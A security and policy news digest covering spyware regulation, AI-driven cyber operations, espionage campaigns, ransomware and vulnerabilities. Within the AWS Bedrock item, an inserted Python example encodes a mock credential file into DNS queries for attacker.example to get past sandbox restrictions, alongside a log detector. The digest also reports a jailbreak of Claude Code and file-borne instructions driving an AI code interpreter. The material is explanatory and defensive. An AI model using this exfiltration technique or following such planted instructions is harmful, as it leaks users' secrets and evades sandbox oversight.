Governance, Regulation, and Legislation
Spyware-Based Searches for Domestic Criminal Law Enforcement
(Yotam Berger – Lawfare) In the United States, NSO Group—the Israeli spyware firm infamous for numerous reported abuses of its product, Pegasus—has been under intense scrutiny in recent years. A series of reports revealed the extent to which NSO’s global clients have abused its spyware, infecting devices owned by journalists, political dissidents, political leaders, and civil rights activists around the world. Yet despite initial U.S. sanctions, in October 2025 NSO confirmed that an American investment group had acquired the company. The legal discussion surrounding spyware such as Pegasus has often revolved around national security, foreign intelligence, and international law. However, the legal and theoretical frameworks governing such tools in the context of criminal justice and domestic law enforcement are different and underexplored. Here, I present an initial evaluation of how these tools could be legally approached when used in the domestic criminal justice sphere. Following the Pegasus crisis, the U.S.—which reportedly originally purchased Pegasus itself, presumably for research and not for operational use—sanctioned NSO, among other firms, including by placing it on the Commerce Department’s Entity List. NSO remained active, though, and in October 2025, it confirmed that a U.S. investment group had acquired the company. Shortly thereafter, it was reported that NSO had also named a new chairman, David Friedman, the former U.S. ambassador to Israel. Israeli media has framed this move as part of NSO’s efforts to get off the U.S. blacklist. Yet, NSO is not the only company interested in selling spyware solutions or digital forensics tools to American law enforcement. Just recently, it was reported that another Israeli spyware firm, Paragon, sold its Graphite spyware, allegedly for use by Immigration and Customs Enforcement (ICE). These developments raise a pressing question: How should the American legal system treat commercial spyware? 
Shortcomings in oversight in other democracies that have employed Pegasus demonstrate the dangers of failing to establish clear frameworks: In Israel, for instance, a Ministry of Justice report and a recent State Comptroller report both found that the police used Pegasus in ways that were not compliant with Israeli criminal procedure. The European Parliament’s PEGA report, too, found abuses in certain member states. The U.S. must avoid similar instances of abuse and noncompliant use. – https://www.lawfaremedia.org/article/spyware-based-searches-for-domestic-criminal-law-enforcement
Defence and Intelligence
When AI Runs the Operations: Autonomous Agents and the Future of Cyber Competition
(Jam Kraprayoon and Shaun Ee – Just Security) On March 6, the White House released President Donald Trump’s Cyber Strategy for America. Among its commitments, the strategy pledges to “rapidly adopt and promote agentic AI in ways that securely scale network defense and disruption.” That sentence signals how far U.S. cyber policy has shifted—from AI as a cybersecurity tool to autonomous agents as instruments of both defence and offensive disruption. The United States is not alone in recognizing the potential of agentic cyber capabilities. In November 2025, Anthropic assessed that a Chinese state-sponsored group had jailbroken Claude Code to launch cyber operations against roughly thirty global targets. Even though they risked exposure, Chinese actors used Anthropic’s software coding agent with custom scaffolding to automate eighty to ninety percent of the operation, marking the first known incident of a large-scale cyber campaign planned and executed primarily by an AI system rather than human operators. As agentic capabilities advance, nation-states and other threat actors have powerful incentives to push towards what we, in a new report from the Institute for AI Policy and Strategy, term “highly autonomous cyber-capable agents” (HACCAs), or systems that independently conduct end-to-end cyber campaigns at the level of the most sophisticated criminal groups and nation-state hackers. Policymakers face three questions: how to assess a capability still taking shape, how to defend against it, and how to ensure their own use does not create new risks. – https://www.justsecurity.org/133668/ai-agents-future-cyber-competition/
Security and Surveillance
Cyberattack disrupts parking payments in Russian city
(Daryna Antoniuk – The Record) The Russian city of Perm has restored its parking payment system after a cyberattack last week knocked the service offline and temporarily made parking free for several days. City authorities confirmed Monday that the system is now fully operational and that all payment methods are working normally. The disruption was caused by a large-scale distributed denial-of-service (DDoS) attack that overwhelmed the city’s automated parking payment infrastructure, according to local officials. – https://therecord.media/cyberattack-russia-parking-system
Russia-linked espionage campaign targeting Ukraine using Starlink and charity lures
(Daryna Antoniuk – The Record) A relatively new Russia-linked hacker group has launched a cyber-espionage campaign targeting Ukrainian organizations using spyware disguised within documents about Starlink satellite internet terminals and a well-known Ukrainian charity, researchers have found. The campaign, observed in February, deployed a backdoor dubbed DrillApp that allows attackers to upload and download files from infected computers, record audio through a microphone and capture images from a webcam, according to a report by cybersecurity firm Lab52. Researchers attributed the campaign to the Russia-linked hacker group Laundry Bear, also tracked as Void Blizzard, which has been active since at least 2024 and has previously targeted NATO member states and Ukrainian institutions. – https://therecord.media/russia-ukraine-cyber-espionage-group
Researchers Warn of Global Surge in Fake Shipment Tracking Scams
(Kevin Poireault – Infosecurity Magazine) Fake shipment tracking scams are rapidly scaling across the world, exploiting the 161 billion annual parcel volume that fuels global e-commerce, according to threat intelligence provider Group-IB. The firm’s Threat Intelligence research team detected a spike in this type of scheme exploiting the popularity of parcel delivery services in 2025. From almost no such activity observed in 2024, the researchers identified over 100 fake shipment tracking campaigns almost every month throughout the past year, with peaks at 218 and 208 unique campaigns in June and December 2025, respectively. – https://www.infosecurity-magazine.com/news/global-surge-fake-shipment/
Security Flaw in AWS Bedrock Code Interpreter Raises Alarms
(Alessandro Mascellino – Infosecurity Magazine) A method for exfiltrating sensitive data from AI-powered code execution environments using domain name system (DNS) queries has been demonstrated by security researchers, highlighting potential risks in cloud-based AI tooling. The Phantom Labs Research report, published on March 16, focuses on AWS Bedrock AgentCore Code Interpreter and shows how attackers could bypass expected network restrictions in Sandbox Mode to retrieve data from cloud resources. The technique relies on DNS resolution capabilities that remain active even when outbound network connections are otherwise restricted. According to the researchers, this behaviour allows malicious instructions embedded in files to create a covert command-and-control (C2) channel. – https://www.infosecurity-magazine.com/news/security-flaw-aws-bedrock/
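The generic mechanism such a channel relies on, as an added illustration that is not code from the Phantom Labs report or from AWS: the leaked bytes are base32-encoded into DNS labels, so every chunk leaves the sandbox as a lookup the resolver is still allowed to perform, and the attacker reads the chunks back from the query log of the zone they control. The zone name attacker.example, the payload and the resolver log lines are constructed for the example; the attacker side only builds the names and performs no resolution. The second half is the check a defender would run over the sandbox's resolver log.

```python
# Added example: generic DNS-label exfiltration plus a log-side detector.
# Not code from the Phantom Labs report or from AWS; "attacker.example",
# PAYLOAD and SAMPLE_LOG below are constructed for illustration only.
import base64
import math
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical limit for a full presentation-format name


def encode_exfil(data: bytes, zone: str, label_len: int = 60) -> list[str]:
    """Turn data into query names '<seq>.<base32 chunk>.<zone>'.

    Base32 is used because DNS matching is case-insensitive, so base64's
    mixed case would not survive the trip. A live channel would hand each
    name to the resolver (e.g. socket.gethostbyname); here only the names are built.
    """
    label_len = min(label_len, MAX_LABEL)
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    chunks = [b32[i:i + label_len] for i in range(0, len(b32), label_len)]
    names = []
    for seq, chunk in enumerate(chunks):
        name = f"{seq}.{chunk}.{zone}"
        if len(name) > MAX_NAME:
            raise ValueError("zone too long for the chosen label length")
        names.append(name)
    return names


def decode_exfil(names: list[str], zone: str) -> bytes:
    """Reassemble the payload from the names that reached the zone's
    authoritative server. Queries may arrive out of order, hence the seq label."""
    suffix = "." + zone
    parts: dict[int, str] = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, chunk = name[:-len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    b32 = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def _entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character."""
    n = len(s)
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def flag_dns_log(lines: list[str], name_threshold: int = 8) -> dict[str, list[str]]:
    """Score a resolver log of 'timestamp client qname qtype' lines.

    Two signals of label-stuffing: an unusually long or high-entropy label,
    and many distinct names under one parent zone (a chunked transfer).
    The parent zone is taken as the last two labels; a production detector
    would use the Public Suffix List and allowlist known CDN/SaaS zones,
    because the volume signal on its own is noisy for those.
    """
    names_by_zone: dict[str, set] = defaultdict(set)
    reasons: dict[str, set] = defaultdict(set)
    for line in lines:
        qname = line.split()[2].rstrip(".").lower()
        labels = qname.split(".")
        if len(labels) < 2:
            continue
        zone = ".".join(labels[-2:])
        names_by_zone[zone].add(qname)
        for label in labels[:-2]:
            if len(label) >= 40 or (len(label) >= 20 and _entropy(label) >= 3.5):
                reasons[zone].add("long or high-entropy label")
    for zone, names in names_by_zone.items():
        if len(names) >= name_threshold:
            reasons[zone].add("many distinct names under one zone")
    return {zone: sorted(r) for zone, r in reasons.items()}


# Constructed payload standing in for a credential file read inside the sandbox.
PAYLOAD = b'{"AccessKeyId":"EXAMPLEKEYID0001","SecretAccessKey":"not-a-real-secret/example+only"}'
EXFIL_ZONE = "attacker.example"
EXFIL_NAMES = encode_exfil(PAYLOAD, EXFIL_ZONE)

# Constructed resolver log: ordinary sandbox lookups followed by the exfil queries.
SAMPLE_LOG = [
    "2026-03-16T10:00:01Z 10.0.0.5 sts.amazonaws.com. A",
    "2026-03-16T10:00:02Z 10.0.0.5 bedrock-runtime.us-east-1.amazonaws.com. A",
    "2026-03-16T10:00:03Z 10.0.0.5 pypi.org. AAAA",
] + [f"2026-03-16T10:00:{4 + i:02d}Z 10.0.0.5 {n}. A" for i, n in enumerate(EXFIL_NAMES)]

if __name__ == "__main__":
    print("round trip ok:", decode_exfil(EXFIL_NAMES, EXFIL_ZONE) == PAYLOAD)
    for zone, why in flag_dns_log(SAMPLE_LOG).items():
        print(zone, why)
```

The practical takeaway is that "no outbound network" is not the same as "no outbound bytes" while name resolution still works: the sandbox's resolver should be one you operate, log and filter, and a check like flag_dns_log is the minimum to run over that log.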
UK: Companies House Web Glitch Exposes Corporate Details to Fraudsters
(Phil Muncaster – Infosecurity Magazine) The UK’s Companies House has been forced to suspend access to its WebFiling dashboard after being notified of a serious flaw which may have exposed countless businesses to fraud. The government agency, which is in charge of incorporating and dissolving the nation’s listed companies, made the move on Friday after being notified by Dan Neidle, founder of Tax Policy Associates. It was brought to the attention of Neidle by John Hewitt at business service provider Ghost Mail. As the former explained in a blog post on Friday, the security glitch is quite simple to exploit. – https://www.infosecurity-magazine.com/news/companies-house-glitch-exposes/
FBI launches inquiry into Steam games spreading malware
(Pierluigi Paganini – Security Affairs) The FBI is seeking gamers who downloaded Steam games later found to contain malware. According to a notice from the FBI’s Seattle Division, investigators are trying to identify victims who installed one of eight malicious titles on the platform between May 2024 and January 2026 as part of an ongoing probe. “The FBI’s Seattle Division is seeking to identify potential victims installing Steam games embedded with malware. The FBI believes the threat actor primarily targeted users between the timeframe of May 2024 and January 2026. In the investigation, several games have been identified to include, BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi, and Tokenova.” reads the notice published by the Bureau. “If you and/or your minor dependent(s) were victimized from installing one of these games or have information relevant to this investigation, please fill out this short form.” – https://securityaffairs.com/189515/cyber-crime/fbi-launches-inquiry-into-steam-games-spreading-malware.html
Former German foreign intelligence VP hit in Signal account takeover campaign
(Pierluigi Paganini – Security Affairs) A cyberattack targeting Signal and WhatsApp users has hit high-ranking German officials, including former BND Vice President Arndt Freytag von Loringhoven. The official reported being contacted by someone posing as Signal support and asked for his PIN. This incident highlights a broader cyber espionage campaign against sensitive individuals in security agencies and political positions. “He is far from the only prominent victim of the global wave of attacks against user accounts at Signal and WhatsApp. According to SPIEGEL, high-ranking German politicians have reported themselves to the authorities as victims, and active officials in security agencies have also been attacked.” reads the report published by SPIEGEL. Back in February, the Federal Office for the Protection of the Constitution (BfV) and the Federal Office for Information Security (BSI) classified the attack as “security-relevant” and urged those affected to come forward. The BfV stated that this warning met with a “high response” and that they believe it prevented even worse damage. German authorities warned Signal users to check for suspicious signs, such as unknown devices listed under “paired devices” or unexpected prompts to re-register accounts. – https://securityaffairs.com/189509/intelligence/former-germanys-foreign-intelligence-vp-hit-in-signal-account-takeover-campaign.html
Advanced Protection Mode in Android 17 prevents apps from misusing Accessibility Services
(Pierluigi Paganini – Security Affairs) Android 17 introduces a new security feature in Android Advanced Protection Mode (AAPM) that blocks apps without accessibility functions from accessing the Accessibility API. The change, first reported by Android Authority and included in Android 17 Beta 2, aims to prevent malware from abusing these services to spy on users, steal data, or control devices. The AccessibilityService API allows apps to interact deeply with the Android interface to help people with disabilities navigate and control their devices. Apps designed for accessibility can declare the isAccessibilityTool attribute and are exempt from some disclosure requirements. However, this powerful access has been abused by malware in the past. Malicious apps have used the API to read screen content, capture keystrokes, click buttons automatically, grant themselves permissions, and steal sensitive data such as banking credentials. Because it can control the interface, attackers have leveraged it to perform fraud, install additional malware, and bypass security prompts. – https://securityaffairs.com/189497/security/advanced-protection-mode-in-android-17-prevents-apps-from-misusing-accessibility-services.html
Unprivileged users could exploit AppArmor bugs to gain root access
(Pierluigi Paganini – Security Affairs) Qualys researchers disclosed nine vulnerabilities, collectively tracked as CrackArmor, in the Linux kernel’s AppArmor module. The flaws have existed since 2017 and could allow unprivileged users to bypass protections, escalate privileges to root, run code in the kernel, or cause denial-of-service conditions. AppArmor is a Linux security module that protects the operating system and applications by enforcing strict behavior rules to block both known and unknown threats, including zero-day attacks. It adds mandatory access control to the traditional Unix discretionary access model and has been part of the Linux kernel since version 2.6.36, with development supported by Canonical since 2009. – https://securityaffairs.com/189487/hacking/unprivileged-users-could-exploit-apparmor-bugs-to-gain-root-access.html
Payload Ransomware claims the hack of Royal Bahrain Hospital
(Pierluigi Paganini – Security Affairs) The Payload Ransomware group claims to have hacked the Royal Bahrain Hospital (RBH) and stolen 110 GB of data. The ransomware gang added the healthcare facility to its Tor data leak site and published the images of allegedly hacked systems as proof of the attack. The group is threatening to release the stolen data if the ransom is not paid by March 23. – https://securityaffairs.com/189467/cyber-crime/payload-ransomware-claims-the-hack-of-royal-bahrain-hospital.html